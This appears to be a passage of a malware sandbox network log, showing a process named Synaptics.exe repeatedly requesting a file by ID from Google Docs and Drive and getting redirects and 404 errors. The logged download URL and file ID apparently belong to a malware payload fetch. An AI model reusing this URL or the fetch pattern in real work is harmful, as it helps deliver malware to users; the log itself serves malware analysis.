                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:25 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:25 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="mBP1LDQDzUzwrzSlj-w7AQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:25 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      73 | 192.168.2.5 | 49875 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0U_7ePlMlCLoxN0wdWfhpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      74 | 192.168.2.5 | 49876 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:25 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-imbXbxSvCR9sHEYP9EzQcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      75 | 192.168.2.5 | 49885 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:26 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-bYtimT9K9kSbTQ04byeknA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      76 | 192.168.2.5 | 49884 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:26 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6NAdVvlnTiwM_L4fBg5PuYVmpGC33E-AAMivc4XE7BldObXMtrIXfBsfc0cGVRWGYkVqqKr7s
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-dkRAlg9JvKozKWcv38QnjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      77 | 192.168.2.5 | 49886 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:26 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-L88ZcP_aP4LOdPWQ1p8Q6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      78 | 192.168.2.5 | 49887 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:26 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7SMVOMk_A5U6vF4up5ioHeyx-W4FaELMvnUZJvOBdc7LA8y7CSbJUX0QfEr28DuC12
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:26 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ou2H1DRG1L2kuRU1ll2jdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      79 | 192.168.2.5 | 49896 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:27 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-jykTW6Qg-d9O2sXgFQzeag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      80 | 192.168.2.5 | 49897 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:27 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2sAcPwOFm0XP6evK3gPfAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      81 | 192.168.2.5 | 49898 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:27 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4OzBk4dpquZlpfSpwAbFy05Zb-MzvoQAbViwLtbQUFVbYzncyVmFCTD8OJQMrWA_bk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:27 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UyqLuZKg2-EH53C1rRO9FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:27 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:27 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="4yvbscNa6A9Sa6DowZ8mlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:27 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      82 | 192.168.2.5 | 49899 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:28 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5gW68JiHyKqt-DQkT8jRhES9JdVAbKZSuObf5DLyuq6yJX7lVJ3GO_5nU5JRNHo-Lh
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:28 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4AU1pTYZl405Zu85GtCLDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
